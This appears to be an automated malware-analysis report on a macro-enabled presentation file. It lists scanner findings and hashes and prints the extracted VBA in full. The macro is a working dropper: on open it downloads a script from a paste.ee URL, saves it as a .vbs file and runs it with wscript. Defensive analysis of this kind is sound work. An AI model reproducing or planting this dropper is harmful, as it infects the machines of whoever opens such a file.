Verdict: MALICIOUS
Risk score: 190
Heuristics: 6
Findings:

- VBA project inside OOXML (medium; OOXML_VBA; 4 related findings): Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (critical; OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `Shell ("wscript PKDW.vbs")`
- VBA downloads and writes a file to disk (critical; OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script: `.write JjBl.responseBody`
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set JjBl = CreateObject("Microsoft.XMLHTTP")`
- Auto_Open macro (low; OLE_VBA_AUTO): Auto_Open macro. Matched line in script: `Public Sub Auto_Open()`
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: https://paste.ee/d/OxThF/0 (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1061 bytes | 88974c3139f69c3dc1a4504e8b4b3d822b677b5f4888dbd6130c3ac16f3f2f98 |
| vbaProject_00.bin | vba-project | OOXML VBA project: ppt/vbaProject.bin | 108032 bytes | 54dfa6ebe141dc3c25230626165f804bc81aeff23ef51e1393acd1683c751aa5 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
Set JjBl = CreateObject("Microsoft.XMLHTTP")
Set YoLW = CreateObject("Adodb.Stream")
With JjBl
.Open "GET", "https://paste.ee/d/OxThF/0", False
.send
End With
With YoLW
.Type = 1
.Open
.write JjBl.responseBody
.savetofile "PKDW.vbs", 2
End With
Shell ("wscript PKDW.vbs")
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D0A1A585-CDA5-4A8A-B275-FCE26607F9CC}{B6D80F10-933B-4A57-8E4E-567EBDC053C2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{EF85728B-2834-4A6C-B0E9-D369092343D3}{045A2107-5B4D-4169-B9E2-F5B768339FFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```